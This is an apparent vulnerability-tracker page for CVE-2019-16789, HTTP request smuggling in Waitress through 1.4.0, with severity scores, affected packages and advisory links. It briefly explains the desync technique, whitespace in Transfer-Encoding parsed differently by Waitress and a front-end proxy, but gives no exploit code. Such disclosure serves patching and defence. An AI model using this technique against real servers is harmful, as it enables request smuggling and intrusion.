CVE-2019-16789 — HTTP Request Smuggling in Waitress
Severity
8.2HIGHNVD
CNA7.1
EPSS
0.9%
top 24.57%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
Timeline
PublishedDec 26
Latest updateApr 15
Description
In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is co…
CVSS vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:NExploitability: 3.9 | Impact: 4.2
Affected Packages4 packages
Also affects: Debian Linux 9.0, Fedora 30, 31
Patches
🔴Vulnerability Details
4OSV
▶
GHSA
▶
📋Vendor Advisories
3Red Hat
▶
Debian▶
CVE-2019-16789: waitress - In Waitress through version 1.4.0, if a proxy server is used in front of waitres...↗2019
💬Community
4Bugzilla▶
CVE-2019-16789 python-waitress: waitress: HTTP Request Smuggling through Invalid whitespace characters in headers [openstack-rdo]↗2020-01-14
Bugzilla▶
CVE-2019-16789 python-waitress: waitress: HTTP Request Smuggling through Invalid whitespace characters in headers [fedora-all]↗2020-01-10
Bugzilla▶
CVE-2019-16789 python-waitress: waitress: HTTP Request Smuggling through Invalid whitespace characters in headers [epel-all]↗2020-01-10
Bugzilla▶
CVE-2019-16789 waitress: HTTP Request Smuggling through Invalid whitespace characters in headers↗2020-01-10